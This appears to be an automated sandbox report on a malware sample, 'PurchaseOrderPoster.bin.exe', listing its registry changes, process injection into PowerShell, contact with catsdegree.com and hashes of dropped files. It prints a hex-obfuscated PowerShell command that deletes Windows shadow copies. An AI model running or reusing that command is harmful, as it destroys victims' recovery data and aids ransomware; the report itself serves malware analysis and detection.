| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\21b2020d\DefaultIcon\ = "C:\\Users\\Admin\\AppData\\Local\\21b2020d.ico" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\.21b2020d\ = "21b2020d" | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 904 wrote to memory of 1660 | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
| PID 904 wrote to memory of 1660 | N/A | C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Processes
C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe
"C:\Users\Admin\AppData\Local\Temp\PurchaseOrderPoster.bin.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ep bypass -c "(0..61)|%{$s+=[char][byte]('0x'+'4765742D576D694F626A6563742057696E33325F536861646F77636F7079207C20466F72456163682D4F626A656374207B245F2E44656C65746528293B7D20'.Substring(2*$_,2))};iex $s"
C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | catsdegree.com | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
| US | 8.8.8.8:53 | 44.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 51.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 27.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 29.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 36.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 77.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 52.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 16.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 45.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 46.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 47.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 74.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 78.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 82.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 49.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 54.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 55.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 60.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 62.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 59.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 61.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 64.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 65.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 69.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 63.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 80.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 81.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 79.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 42.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 41.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 39.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 40.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 57.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 35.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 37.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 34.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 33.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 32.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 30.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 24.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 7.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 5.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 89.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 91.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 93.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 101.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 104.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 116.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 117.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 121.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 123.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 18.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 118.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 120.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 119.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 114.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 113.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 115.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 112.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 110.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 111.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 108.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 109.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 107.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 105.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 99.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 94.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 90.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 87.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 85.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 86.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 84.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 83.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 3.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 2.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 4.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 6.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 8.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 10.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 9.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 11.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 12.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 128.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 122.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 96.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 88.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 127.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 92.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 124.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 126.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 125.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 167.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 188.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 192.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 186.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 181.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 180.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 179.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 178.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 169.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 166.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 160.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 156.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 153.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 149.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 193.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 242.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 129.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 130.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 231.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 134.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 136.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 135.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 137.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 139.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 141.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 142.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 145.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 147.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 146.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 148.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 151.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 155.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 152.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 158.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 163.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 161.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 159.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 157.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 162.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 164.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 165.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 168.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 170.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 174.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 175.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 176.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 177.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 182.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 183.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 184.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 187.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 185.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 189.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 191.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 190.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 194.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 202.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 207.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 208.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 211.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 219.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 223.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 225.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 218.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 228.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 229.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 230.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 234.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 235.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 236.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 238.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 239.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 227.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 224.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 226.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 222.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 220.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 216.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 214.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 213.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 204.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 203.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 195.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 254.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 253.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 251.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 245.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 250.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 246.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 243.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 244.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 248.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 252.0.10.10.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 247.0.10.10.in-addr.arpa | udp |
| US | 72.52.178.23:443 | catsdegree.com | tcp |
Files
memory/1660-114-0x0000000000000000-mapping.dmp
memory/1660-120-0x0000021F9D400000-0x0000021F9D401000-memory.dmp
memory/1660-125-0x0000021F9F700000-0x0000021F9F701000-memory.dmp
memory/1660-127-0x0000021F9D4A3000-0x0000021F9D4A5000-memory.dmp
memory/1660-128-0x0000021F9D4A6000-0x0000021F9D4A8000-memory.dmp
memory/1660-126-0x0000021F9D4A0000-0x0000021F9D4A2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | ea6243fdb2bfcca2211884b0a21a0afc |
| SHA1 | 2eee5232ca6acc33c3e7de03900e890f4adf0f2f |
| SHA256 | 5bc7d9831ea72687c5458cae6ae4eb7ab92975334861e08065242e689c1a1ba8 |
| SHA512 | 189db6779483e5be80331b2b64e17b328ead5e750482086f3fe4baae315d47d207d88082b323a6eb777f2f47e29cac40f37dda1400462322255849cbcc973940 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 10ae7d2f51d2617d215721614d2c7ce2 |
| SHA1 | 3ec2ee296e27ef658476697c32b924bf1a678e4e |
| SHA256 | 9d51891e89c730c55335fbba1808d3f91d060ecbc39f98904372bca1ef2dc8cc |
| SHA512 | cd013dc67f34a2b890dcf5c3479f5d018c99194bd676b1e08529ee780d4555746725d54b94b5b81d22798a0580971944341d80ec13f37cdb054640eec0d12963 |